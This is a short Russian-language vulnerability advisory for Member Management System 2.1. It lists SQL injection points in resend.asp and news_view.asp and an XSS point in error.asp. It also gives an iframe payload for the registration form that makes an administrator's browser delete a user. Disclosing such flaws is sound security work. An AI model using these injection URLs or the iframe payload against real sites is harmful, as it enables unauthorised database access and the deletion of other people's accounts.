Уязвима Member Management System 2.1. Выполнение
произвольных SQL команд:

http://[host]/resend.asp?ID=[SQL query]
http://[host]/news_view.asp?ID=[SQL query]

Выполнение скриптов в register.asp и error.asp:

http://[host]/error.asp?err=">[XSS]

Например, удаление пользователя. В
регистрационной форме:

"><iframe src=http://[host]/admin/user_del.asp?ID=[ID to delete]>

Оставить мнение